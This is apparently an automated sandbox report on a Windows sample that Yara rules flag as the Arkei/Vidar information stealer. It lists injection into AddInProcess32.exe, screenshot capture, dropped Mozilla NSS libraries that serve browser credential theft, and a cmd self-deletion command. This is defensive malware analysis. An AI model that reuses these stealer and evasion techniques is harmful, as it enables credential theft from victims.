                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_004159B0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_004159B0

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.4bVsmYiuXy.exe.32ceb10.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
                  Source: 0.2.4bVsmYiuXy.exe.32ceb10.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
                  Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
                  Source: 0.2.4bVsmYiuXy.exe.13281908.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
                  Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
                  Source: 0.2.4bVsmYiuXy.exe.13281908.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
                  Source: 00000000.00000002.1632581206.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
                  Source: 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                  Source: 00000001.00000002.1678526182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
                  Source: 00000000.00000002.1632682866.0000000013259000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
                  Source: Process Memory Space: AddInProcess32.exe PID: 6600, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                  Source: decrypted.memstr, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0041B0201_2_0041B020
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00410F001_2_00410F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0041A7901_2_0041A790
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0041A1901_2_0041A190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_0041A5A01_2_0041A5A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_004107B01_2_004107B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6094DA3A1_2_6094DA3A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_609660FA1_2_609660FA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6092114F1_2_6092114F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6091F2C91_2_6091F2C9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6096923E1_2_6096923E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6095C3141_2_6095C314
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_609503121_2_60950312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6094D33B1_2_6094D33B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6093B3681_2_6093B368
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6096748C1_2_6096748C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6093F42E1_2_6093F42E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_609544701_2_60954470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_609615FA1_2_609615FA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6096A5EE1_2_6096A5EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6096D6A41_2_6096D6A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_609606A81_2_609606A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_609326541_2_60932654
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_609556651_2_60955665
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6094B7DB1_2_6094B7DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6092F74D1_2_6092F74D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_609648071_2_60964807
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6094E9BC1_2_6094E9BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_609379291_2_60937929
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6093FAD61_2_6093FAD6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6096DAE81_2_6096DAE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60936B271_2_60936B27
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60954CF61_2_60954CF6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60950C6B1_2_60950C6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60966DF11_2_60966DF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60963D351_2_60963D35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60909E9C1_2_60909E9C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60951E861_2_60951E86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60912E0B1_2_60912E0B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60954FF81_2_60954FF8
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 004054F0 appears 577 times
                  Source: 4bVsmYiuXy.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 0.2.4bVsmYiuXy.exe.32ceb10.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
                  Source: 0.2.4bVsmYiuXy.exe.32ceb10.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
                  Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
                  Source: 0.2.4bVsmYiuXy.exe.13281908.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
                  Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
                  Source: 0.2.4bVsmYiuXy.exe.13281908.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
                  Source: 00000000.00000002.1632581206.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
                  Source: 00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                  Source: 00000001.00000002.1678526182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
                  Source: 00000000.00000002.1632682866.0000000013259000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
                  Source: Process Memory Space: AddInProcess32.exe PID: 6600, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                  Source: decrypted.memstr, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/14@0/1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Desktop\BAIMOHVSJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
                  Source: 4bVsmYiuXy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 4bVsmYiuXy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: nss3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: softokn3.dll.1.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                  Source: softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: nss3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s;
                  Source: softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: nss3.dll.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: nss3.dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: nss3.dll.1.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                  Source: nss3.dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: nss3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
                  Source: nss3.dll.1.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                  Source: BIM7Y5P8.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: 4bVsmYiuXy.exeVirustotal: Detection: 54%
                  Source: unknownProcess created: C:\Users\user\Desktop\4bVsmYiuXy.exe C:\Users\user\Desktop\4bVsmYiuXy.exe
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinProcess32.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinProcess32.exe" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                  Source: C:\Users\user\Desktop\4bVsmYiuXy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinProcess32.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinProcess32.exe" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: 4bVsmYiuXy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 4bVsmYiuXy.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: 4bVsmYiuXy.exeStatic file information: File size 2755584 > 1048576
                  Source: 4bVsmYiuXy.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2a0800
                  Source: 4bVsmYiuXy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr
                  Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
                  Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
                  Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr
                  Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.1.dr
                  Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_00409220 GetEnvironmentVariableA,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00409220
                  Source: mozglue.dll.1.drStatic PE information: section name: .didat
                  Source: msvcp140.dll.1.drStatic PE information: section name: .didat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60983000 pushad ; iretd 1_2_60983031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60923704 push esp; ret 1_2_60923705
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6096D990 push eax; ret 1_2_6096D9C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60922C64 push 83FFFFFDh; ret 1_2_60922C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60911F9E push ecx; mov dword ptr [esp], ebx1_2_60911FD3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60987F71 pushad ; iretd 1_2_60987F74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
